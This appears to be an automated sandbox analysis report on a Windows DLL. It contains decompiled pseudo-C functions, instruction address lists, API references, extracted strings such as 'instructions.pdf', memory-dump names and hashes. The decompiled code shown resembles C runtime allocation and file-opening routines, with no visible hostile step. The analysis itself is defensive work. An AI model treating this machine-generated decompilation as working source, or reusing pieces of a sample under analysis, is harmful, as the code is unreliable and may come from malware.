																													if(_t404 < 0x1000) {
																														L120:
																														_v20 = _t404;
																														_v24 = _t296;
																														_pop(_t521);
																														return L6E530115(_v2328);
																													} else {
																														_t447 =  *((intOrPtr*)(_t296 - 4));
																														_t404 = _t404 + 0x23;
																														__eflags = _t296 - _t447 + 0xfffffffc - 0x1f;
																														if(__eflags > 0) {
																															_push(_t497);
																															_t499 = _t497 ^ _t497;
																															E6E5348FB(_t404, _t499, __eflags, _t499, _t499, _t499, _t499, _t499);
																															_push(_t499);
																															_push(_t499);
																															_push(_t499);
																															_push(_t499);
																															_push(_t499);
																															L124();
																															asm("int3");
																															_t301 = IsProcessorFeaturePresent(0x17);
																															__eflags = _t301;
																															if(_t301 != 0) {
																																_push(5);
																																asm("int 0x29");
																															}
																															_push(_t499);
																															E6E5347B3(_t368, _t447, _t474, 0xc0000417, 2, 0xc0000417, 1);
																															return TerminateProcess(GetCurrentProcess(), 0xc0000417);
																														} else {
																															_t296 = _t447;
																															goto L120;
																														}
																													}
																												} else {
																													_t293 = _t446;
																													goto L113;
																												}
																											}
																										}
																										goto L127;
																										L114:
																										 *(_t497 + 0x10) = 0;
																										 *((intOrPtr*)(_t497 + 0x14)) = 0xf;
																										 *_t497 = 0;
																										_t497 = _t497 + 0x18;
																										__eflags = _t497 - _t474;
																									} while (_t497 != _t474);
																									goto L115;
																								}
																							} else {
																								_t160 = _t293 + 0x23; // 0x23
																								_t496 = _t160 & 0xffffffe0;
																								 *(_t496 - 4) = _t293;
																								L96:
																								_t412 = _v40;
																								_t312 = _v28 + _v28 * 2;
																								 *(_t496 + 0x10 + _t312 * 8) = 0;
																								_t313 = _t496 + _t312 * 8;
																								 *(_t313 + 0x14) = 0;
																								asm("movups xmm0, [ecx]");
																								_v28 = _t313;
																								asm("movups [eax], xmm0");
																								asm("movq xmm0, [ecx+0x10]");
																								asm("movq [eax+0x10], xmm0");
																								_t314 = _v32;
																								 *(_t412 + 0x10) = 0;
																								 *((intOrPtr*)(_t412 + 0x14)) = 0xf;
																								 *_t412 = 0;
																								_t413 =  *_t368;
																								_t451 = _t368[1];
																								_push( *_t368);
																								_push(_t496);
																								__eflags = _t314 - _t368[1];
																								if(_t314 != _t368[1]) {
																									E6E4F78C0(_t413, _t314);
																									_t548 = _t548 + 4;
																									_t451 = _t368[1];
																									_t326 = _v28 + 0x18;
																									__eflags = _t326;
																									_t413 = _v32;
																									_push(_t326);
																								}
																								E6E4F78C0(_t413, _t451);
																								_t414 =  *_t368;
																								_t551 = _t548 + 8;
																								__eflags = _t414;
																								if(_t414 == 0) {
																									L103:
																									_t317 =  &(_v44[1]);
																									__eflags = _t317;
																									 *_t368 = _t496;
																									_t368[1] = _t496 + (_t317 + _t317 * 2) * 8;
																									_t368[2] = _t473 + _t496;
																									return _v28;
																								} else {
																									_push(_t414);
																									L107();
																									_t370 =  *_t368;
																									_t548 = _t551 + 4;
																									_t422 = (0x2aaaaaab * (_v36[2] - _t370) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36[2] - _t370) >> 0x20 >> 2) + ((0x2aaaaaab * (_v36[2] - _t370) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v36[2] - _t370) >> 0x20 >> 2)) * 2 << 3;
																									__eflags = _t422 - 0x1000;
																									if(_t422 < 0x1000) {
																										L102:
																										_push(_t422);
																										_push(_t370);
																										L122();
																										_t368 = _v36;
																										goto L103;
																									} else {
																										_t445 =  *(_t370 - 4);
																										_t401 = _t422 + 0x23;
																										_t368 = _t370 - _t445;
																										_t293 = _t370 - _t445 - 4;
																										__eflags = _t293 - 0x1f;
																										if(_t293 > 0x1f) {
																											goto L106;
																										} else {
																											_t370 = _t445;
																											goto L102;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t132 = _t397 + 0x23; // 0x23
																		_t331 = _t132 & 0xffffffe0;
																		__eflags = _t331;
																		 *(_t331 - 4) = _t397;
																		return _t331;
																	}
																}
															}
														} else {
															_t428 = E6E52F238(_t496, __eflags, _t344);
															_t546 = _t546 + 4;
															__eflags = _t428;
															if(__eflags == 0) {
																L74:
																L123();
																goto L75;
															} else {
																_t119 = _t428 + 0x23; // 0x23
																_t337 = _t119 & 0xffffffe0;
																 *(_t337 - 4) = _t428;
																L68:
																_v20 = _t337;
																 *(_t496 + 0x10) = _t472;
																 *(_t496 + 0x14) = _t366;
																E6E530AC0(_t337, _v24, _t472);
																_t366 = _v20;
																_t546 = _t546 + 0xc;
																_t339 = _v28;
																 *((char*)(_t472 + _t366)) = 0;
																__eflags = _t339 - 0x10;
																if(_t339 < 0x10) {
																	L73:
																	 *_t496 = _t366;
																	return _t496;
																} else {
																	_t128 = _t339 + 1; // 0x6e4f719e
																	_t427 = _t128;
																	_t341 =  *_t496;
																	__eflags = _t427 - 0x1000;
																	if(_t427 < 0x1000) {
																		L72:
																		_push(_t427);
																		_push(_t341);
																		L122();
																		goto L73;
																	} else {
																		_t129 = _t341 - 4; // 0x253
																		_t458 =  *_t129;
																		_t427 = _t427 + 0x23;
																		__eflags = _t341 - _t458 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L74;
																		} else {
																			_t341 = _t458;
																			goto L72;
																		}
																	}
																}
															}
														}
													}
												}
											} else {
												_t374 = _t496;
												__eflags = _t396 - 0x10;
												if(_t396 >= 0x10) {
													_t374 =  *_t496;
												}
												 *(_t496 + 0x10) = _t472;
												E6E530AC0(_t374, _t275, _t472);
												 *((char*)(_t472 + _t374)) = 0;
												return _t496;
											}
										} else {
											_t272 = _t441;
											goto L48;
										}
									}
								}
							} else {
								goto L23;
							}
						}
					}
				}
				L127:
			}

0x6e4f6e50
0x6e4f6e50
0x6e4f6e50
0x6e4f6e51
0x6e4f6e59
0x6e4f6e60
0x6e4f6e64
0x6e4f6e6c
0x6e4f6e73
0x6e4f6e77
0x6e4f6e86
0x6e4f6e9f
0x6e4f6ea9
0x6e4f6eba
0x6e4f6eca
0x6e4f6ecf
0x6e4f6ed7
0x6e4f6ed9
0x6e4f6edb
0x6e4f6ee1
0x6e4f6ee7
0x6e4f6eec
0x6e4f6eed
0x6e4f6eee
0x6e4f6eef
0x6e4f6ef1
0x6e4f6ef8
0x6e4f6f12
0x6e4f6f18
0x6e4f6f36
0x6e4f6f3c
0x6e4f6f3e
0x6e4f6f44
0x6e4f6f4a
0x6e4f6f6b
0x6e4f6f6b
0x6e4f6f75
0x6e4f6f4c
0x6e4f6f4c
0x6e4f6f55
0x6e4f6f5a
0x6e4f6f60
0x6e4f6f63
0x6e4f6f4e
0x6e4f6f4e
0x6e4f6f53
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4f6f53
0x6e4f6f4c
0x6e4f6f7f
0x6e4f6f87
0x6e4f6f90
0x6e4f6f95
0x6e4f6f97
0x6e4f6f99
0x6e4f6f9f
0x6e4f6fa5
0x6e4f6faa
0x6e4f6fab
0x6e4f6fac
0x6e4f6fad
0x6e4f6faf
0x6e4f6fb6
0x6e4f6fd0
0x6e4f6fd6
0x6e4f6fef
0x6e4f6ff4
0x6e4f6ffc
0x6e4f7002
0x6e4f7004
0x6e4f700a
0x6e4f7010
0x6e4f7012
0x6e4f701e
0x6e4f701a
0x6e4f701a
0x6e4f701a
0x6e4f7022
0x00000000
0x00000000
0x6e4f7028
0x6e4f7028
0x6e4f702a
0x6e4f7030
0x6e4f7032
0x6e4f7043
0x6e4f7048
0x6e4f704e
0x6e4f7050
0x6e4f7056
0x6e4f7058
0x6e4f705d
0x6e4f7065
0x6e4f7075
0x6e4f707b
0x6e4f7067
0x6e4f7067
0x6e4f706d
0x6e4f706d
0x6e4f708a
0x6e4f708f
0x6e4f7098
0x6e4f70a1
0x6e4f70a4
0x6e4f70a9
0x6e4f70a9
0x6e4f70b1
0x6e4f70b7
0x6e4f70b9
0x6e4f7331
0x6e4f7344
0x6e4f7346
0x6e4f7348
0x6e4f7350
0x6e4f7353
0x6e4f735c
0x6e4f7365
0x6e4f7365
0x6e4f7378
0x6e4f737a
0x6e4f737a
0x6e4f7382
0x6e4f7384
0x6e4f7390
0x6e4f70bf
0x6e4f70c4
0x6e4f70ec
0x6e4f70ee
0x6e4f70f4
0x6e4f70fa
0x6e4f710c
0x6e4f711a
0x6e4f7128
0x6e4f7130
0x6e4f713e
0x6e4f7143
0x6e4f714a
0x6e4f7150
0x6e4f7158
0x6e4f7163
0x6e4f716a
0x6e4f716a
0x6e4f716a
0x6e4f716c
0x6e4f716e
0x6e4f7176
0x6e4f7180
0x6e4f718a
0x6e4f7194
0x6e4f7198
0x6e4f719d
0x6e4f71a3
0x6e4f71a9
0x6e4f71d8
0x6e4f71d9
0x6e4f71e0
0x6e4f71e5
0x6e4f71ab
0x6e4f71ab
0x6e4f71af
0x6e4f71b6
0x6e4f71bb
0x6e4f71bf
0x6e4f71c2
0x6e4f71c7
0x6e4f71cc
0x6e4f71cc
0x6e4f71e8
0x6e4f71eb
0x6e4f7219
0x6e4f7219
0x6e4f7220
0x6e4f7225
0x6e4f722c
0x6e4f7243
0x6e4f7245
0x6e4f7247
0x6e4f724d
0x6e4f724d
0x6e4f7251
0x6e4f7254
0x6e4f725a
0x6e4f7260
0x6e4f7265
0x6e4f726b
0x6e4f726d
0x6e4f726f
0x6e4f726f
0x6e4f7277
0x6e4f7278
0x6e4f7279
0x6e4f727e
0x6e4f727e
0x6e4f7284
0x6e4f728a
0x6e4f7291
0x6e4f7299
0x6e4f7299
0x6e4f729b
0x6e4f729e
0x6e4f72cf
0x6e4f72cf
0x6e4f72d5
0x6e4f72d7
0x00000000
0x6e4f72d9
0x6e4f72df
0x6e4f72e0
0x6e4f72f0
0x6e4f72f6
0x6e4f730a
0x6e4f730c
0x6e4f730f
0x6e4f7315
0x6e4f7327
0x6e4f7327
0x6e4f7328
0x6e4f7329
0x00000000
0x6e4f7317
0x6e4f7317
0x6e4f731a
0x6e4f731f
0x6e4f7322
0x6e4f7325
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4f7325
0x6e4f7315
0x6e4f72a0
0x6e4f72a0
0x6e4f72a6
0x6e4f72a7
0x6e4f72a9
0x6e4f72af
0x6e4f72c5
0x6e4f72c5
0x6e4f72c6
0x6e4f72c7
0x6e4f72cc
0x00000000
0x6e4f72b1
0x6e4f72b1
0x6e4f72b4
0x6e4f72b9
0x6e4f72bc
0x6e4f72bf
0x00000000
0x00000000
0x00000000
0x00000000
0x6e4f72bf
0x6e4f72af
0x6e4f71ed
0x6e4f71ed
0x6e4f71f0
0x6e4f71f1
0x6e4f71f3
0x6e4f71f9
0x6e4f720f
0x6e4f720f
0x6e4f7210
0x6e4f7211
0x6e4f7216
0x00000000
0x6e4f71fb
0x6e4f71fb
0x6e4f71fe
0x6e4f7203
0x6e4f7206
0x6e4f7209
0x6e4f7391
0x6e4f7391
0x6e4f7396
0x6e4f7397
0x6e4f7398
0x6e4f7399
0x6e4f739a
0x6e4f739b
0x6e4f739c
0x6e4f739d
0x6e4f739e
0x6e4f739f
0x6e4f73a0
0x6e4f73a1
0x6e4f73a3
0x6e4f73a6
0x6e4f73a9
0x6e4f73d2
0x6e4f73d2
0x6e4f73d9
0x6e4f73e0
0x6e4f73e4
0x6e4f73ab
0x6e4f73ab
0x6e4f73ad
0x6e4f73ae
0x6e4f73b4
0x6e4f73c8
0x6e4f73c8
0x6e4f73c9
0x6e4f73ca
0x00000000
0x6e4f73b6
0x6e4f73b6
0x6e4f73b9
0x6e4f73c1
0x6e4f73c4
0x6e4f73e5
0x6e4f73ea
0x6e4f73eb
0x6e4f73ec
0x6e4f73ed
0x6e4f73ee
0x6e4f73ef
0x6e4f73f0
0x6e4f73f1
0x6e4f73f3
0x6e4f73f6
0x6e4f73f9
0x6e4f73fa
0x6e4f73fb
0x6e4f73fd
0x6e4f7400
0x6e4f7401
0x6e4f7404
0x6e4f7407
0x6e4f740a
0x6e4f740c
0x6e4f7434
0x6e4f743a
0x6e4f751e
0x6e4f751e
0x00000000
0x6e4f7440
0x6e4f7442
0x6e4f7445
0x6e4f744b
0x6e4f745b
0x6e4f745f
0x6e4f7461
0x6e4f746a
0x6e4f746d
0x6e4f746f
0x6e4f746f
0x6e4f7463
0x6e4f7463
0x6e4f7463
0x6e4f744d
0x6e4f744d
0x6e4f744d
0x6e4f747e
0x6e4f7480
0x6e4f7486
0x6e4f74ad
0x6e4f74af
0x6e4f74bc
0x6e4f74bc
0x6e4f74b1
0x6e4f74b2
0x6e4f74b7
0x6e4f74b7
0x00000000
0x6e4f7488
0x6e4f7488
0x6e4f7488
0x6e4f748b
0x6e4f748d
0x6e4f7523
0x6e4f7523
0x6e4f7528
0x6e4f7529
0x6e4f752a
0x6e4f752b
0x6e4f752c
0x6e4f752d
0x6e4f752e
0x6e4f752f
0x6e4f7530
0x6e4f7531
0x6e4f7533
0x6e4f7536
0x6e4f753b
0x6e4f7560
0x6e4f7562
0x6e4f7571
0x6e4f7574
0x6e4f7564
0x6e4f756e
0x6e4f756e
0x6e4f753d
0x6e4f753d
0x6e4f7540
0x6e4f7542
0x6e4f7577
0x00000000
0x6e4f7544
0x6e4f754a
0x6e4f754c
0x6e4f754f
0x6e4f7551
0x6e4f757c
0x6e4f757c
0x6e4f7581
0x6e4f7582
0x6e4f7583
0x6e4f7584
0x6e4f7585
0x6e4f7586
0x6e4f7587
0x6e4f7588
0x6e4f7589
0x6e4f758a
0x6e4f758b
0x6e4f758c
0x6e4f758d
0x6e4f758e
0x6e4f758f
0x6e4f7590
0x6e4f7591
0x6e4f7593
0x6e4f7599
0x6e4f75a1
0x6e4f75a2
0x6e4f75a4
0x6e4f75a7
0x6e4f75a8
0x6e4f75ab
0x6e4f75ac
0x6e4f75b8
0x6e4f75bc
0x6e4f75c4
0x6e4f75ce
0x6e4f75d6
0x6e4f75d8
0x6e4f75db
0x6e4f75e0
0x6e4f775c
0x6e4f775c
0x00000000
0x6e4f75e6
0x6e4f75e9
0x6e4f7602
0x6e4f7606
0x6e4f760a
0x6e4f760c
0x6e4f7757
0x6e4f7757
0x00000000
0x6e4f7612
0x6e4f7612
0x6e4f7617
0x6e4f7619
0x6e4f761c
0x6e4f7622
0x00000000
0x6e4f7628
0x6e4f762b
0x6e4f762e
0x6e4f7634
0x6e4f765d
0x6e4f765f
0x6e4f766e
0x6e4f766e
0x6e4f7661
0x6e4f7662
0x6e4f7667
0x6e4f766a
0x6e4f766a
0x00000000
0x6e4f7636
0x6e4f7636
0x6e4f7636
0x6e4f7639
0x6e4f763b
0x00000000
0x6e4f7641
0x6e4f7642
0x6e4f7647
0x6e4f764a
0x6e4f764c
0x6e4f7761
0x6e4f7761
0x6e4f7766
0x6e4f7767
0x6e4f7768
0x6e4f7769
0x6e4f776a
0x6e4f776b
0x6e4f776c
0x6e4f776d
0x6e4f776e
0x6e4f776f
0x6e4f7770
0x6e4f7771
0x6e4f7773
0x6e4f7774
0x6e4f7775
0x6e4f7777
0x6e4f7779
0x6e4f777b
0x6e4f77c7
0x6e4f77ca
0x6e4f7780
0x6e4f7780
0x6e4f7780
0x6e4f7783
0x6e4f7786
0x00000000
0x6e4f7788
0x6e4f7788
0x6e4f778a
0x6e4f778b
0x6e4f7791
0x6e4f77a5
0x6e4f77a5
0x6e4f77a6
0x6e4f77a7
0x6e4f77ac
0x00000000
0x6e4f7793
0x6e4f7793
0x6e4f7796
0x6e4f779e
0x6e4f77a1
0x6e4f77cb
0x6e4f77d0
0x6e4f77d1
0x6e4f77d2
0x6e4f77d3
0x6e4f77d4
0x6e4f77d5
0x6e4f77d6
0x6e4f77d7
0x6e4f77d8
0x6e4f77d9
0x6e4f77da
0x6e4f77db
0x6e4f77dc
0x6e4f77dd
0x6e4f77de
0x6e4f77df
0x6e4f77e0
0x6e4f77e3
0x6e4f77e6
0x6e4f77e9
0x6e4f77ef
0x6e4f7803
0x6e4f7803
0x6e4f7806
0x6e4f7809
0x6e52f275
0x6e4f77f1
0x6e4f77f1
0x6e4f77f4
0x6e4f77fc
0x6e4f77ff
0x6e534971
0x6e534972
0x6e534979
0x6e534981
0x6e534982
0x6e534983
0x6e534984
0x6e534985
0x6e534986
0x6e53498b
0x6e53498e
0x6e534994
0x6e534996
0x6e534998
0x6e53499b
0x6e53499b
0x6e53499d
0x6e5349a8
0x6e5349bf
0x6e4f7801
0x6e4f7801
0x00000000
0x6e4f7801
0x6e4f77ff
0x6e4f77a3
0x6e4f77a3
0x00000000
0x6e4f77a3
0x6e4f77a1
0x6e4f7791
0x00000000
0x6e4f77af
0x6e4f77af
0x6e4f77b6
0x6e4f77bd
0x6e4f77c0
0x6e4f77c3
0x6e4f77c3
0x00000000
0x6e4f7780
0x6e4f7652
0x6e4f7652
0x6e4f7655
0x6e4f7658
0x6e4f7670
0x6e4f7673
0x6e4f7676
0x6e4f7679
0x6e4f7681
0x6e4f7684
0x6e4f768b
0x6e4f768e
0x6e4f7691
0x6e4f7694
0x6e4f7699
0x6e4f769e
0x6e4f76a1
0x6e4f76a8
0x6e4f76af
0x6e4f76b2
0x6e4f76b4
0x6e4f76b7
0x6e4f76b8
0x6e4f76b9
0x6e4f76bb
0x6e4f76bf
0x6e4f76c7
0x6e4f76ca
0x6e4f76cd
0x6e4f76cd
0x6e4f76d0
0x6e4f76d3
0x6e4f76d3
0x6e4f76d4
0x6e4f76d9
0x6e4f76db
0x6e4f76de
0x6e4f76e0
0x6e4f7736
0x6e4f7739
0x6e4f7739
0x6e4f773a
0x6e4f7745
0x6e4f774d
0x6e4f7754
0x6e4f76e2
0x6e4f76e5
0x6e4f76e6
0x6e4f76f3
0x6e4f76f5
0x6e4f770c
0x6e4f770f
0x6e4f7715
0x6e4f7729
0x6e4f7729
0x6e4f772a
0x6e4f772b
0x6e4f7730
0x00000000
0x6e4f7717
0x6e4f7717
0x6e4f771a
0x6e4f771d
0x6e4f771f
0x6e4f7722
0x6e4f7725
0x00000000
0x6e4f7727
0x6e4f7727
0x00000000
0x6e4f7727
0x6e4f7725
0x6e4f7715
0x6e4f76e0
0x6e4f764c
0x6e4f763b
0x6e4f7634
0x6e4f7622
0x6e4f760c
0x6e4f7553
0x6e4f7553
0x6e4f7556
0x6e4f7556
0x6e4f7559
0x6e4f755d
0x6e4f755d
0x6e4f7551
0x6e4f7542
0x6e4f7493
0x6e4f7499
0x6e4f749b
0x6e4f749e
0x6e4f74a0
0x6e4f7519
0x6e4f7519
0x00000000
0x6e4f74a2
0x6e4f74a2
0x6e4f74a5
0x6e4f74a8
0x6e4f74be
0x6e4f74c2
0x6e4f74c6
0x6e4f74c9
0x6e4f74cc
0x6e4f74d1
0x6e4f74d4
0x6e4f74d7
0x6e4f74da
0x6e4f74de
0x6e4f74e1
0x6e4f750c
0x6e4f750d
0x6e4f7516
0x6e4f74e3
0x6e4f74e3
0x6e4f74e3
0x6e4f74e6
0x6e4f74e8
0x6e4f74ee
0x6e4f7502
0x6e4f7502
0x6e4f7503
0x6e4f7504
0x00000000
0x6e4f74f0
0x6e4f74f0
0x6e4f74f0
0x6e4f74f3
0x6e4f74fb
0x6e4f74fe
0x00000000
0x6e4f7500
0x6e4f7500
0x00000000
0x6e4f7500
0x6e4f74fe
0x6e4f74ee
0x6e4f74e1
0x6e4f74a0
0x6e4f748d
0x6e4f7486
0x6e4f740e
0x6e4f740e
0x6e4f7410
0x6e4f7413
0x6e4f7415
0x6e4f7415
0x6e4f741a
0x6e4f741d
0x6e4f7425
0x6e4f7431
0x6e4f7431
0x6e4f73c6
0x6e4f73c6
0x00000000
0x6e4f73c6
0x6e4f73c4
0x6e4f73b4
0x00000000
0x00000000
0x00000000
0x6e4f7209
0x6e4f71f9
0x6e4f71eb
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 6E4F6E86
SetCurrentDirectoryW.KERNEL32(?), ref: 6E4F6EA9

Part of subcall function 6E52D4ED: QueryPerformanceFrequency.KERNEL32(?,00000000,?,?,?,6E4F6ED7), ref: 6E52D508

Part of subcall function 6E52D4D6: QueryPerformanceCounter.KERNEL32(?,?,?,?,6E4F6EEC), ref: 6E52D4DF

__alldvrm.LIBCMT ref: 6E4F6EF1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4F6F31
__alldvrm.LIBCMT ref: 6E4F6FAF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4F6FEF
__Xtime_get_ticks.LIBCPMT ref: 6E4F7038
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4F708A
__fread_nolock.LIBCMT ref: 6E4F710C
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E4F7138
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6E4F7344
TranslateMessage.USER32(?), ref: 6E4F735C
DispatchMessageW.USER32 ref: 6E4F7365
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6E4F7378

Strings

info, xrefs: 6E4F716E
instructions.pdf, xrefs: 6E4F6EC4

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Unothrow_t@std@@@__ehfuncinfo$??2@$ModulePerformanceQuery__alldvrm$CounterCurrentDirectoryDispatchFileFrequencyHandleNameTranslateXtime_get_ticks__fread_nolock
String ID: info$instructions.pdf
API String ID: 1742564883-3969077019
Opcode ID: 0fe4de1edae9163174d5db5a1904fb17e3b857eec48f6f1c60174d3252c1cd46
Instruction ID: abc8666e337b21f8a02e0041087bb6dd76a22cf97412c4abc77bc0ecaa537e7c
Opcode Fuzzy Hash: 0fe4de1edae9163174d5db5a1904fb17e3b857eec48f6f1c60174d3252c1cd46
Instruction Fuzzy Hash: 1CE1C1719142249BDB249FB88C44FDEB7F9BF85704F14859AE548A7280EF749E81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E54B40B, Relevance: 13.8, APIs: 9, Instructions: 273
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E6E54B40B(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E6E54B159(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E6E54A973(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E6E54B0C4(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E6E54A8BE(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x6e68b718 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x6e68b718 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E6E54AE71(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x6e68b718 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x6e68b718 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x6e68b718 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x6e68b718 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x6e68b718 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E6E54B0C4();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x6e68b718 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E6E537E39(GetLastError());
											 *( *((intOrPtr*)(0x6e68b718 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x6e68b718 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E6E54AA86( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E6E54B2D3(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E6E54511A(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E6E537E39(_t271);
							 *( *((intOrPtr*)(0x6e68b718 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x6e68b718 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E6E537E6F(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x6e68b718 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E6E537E39(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
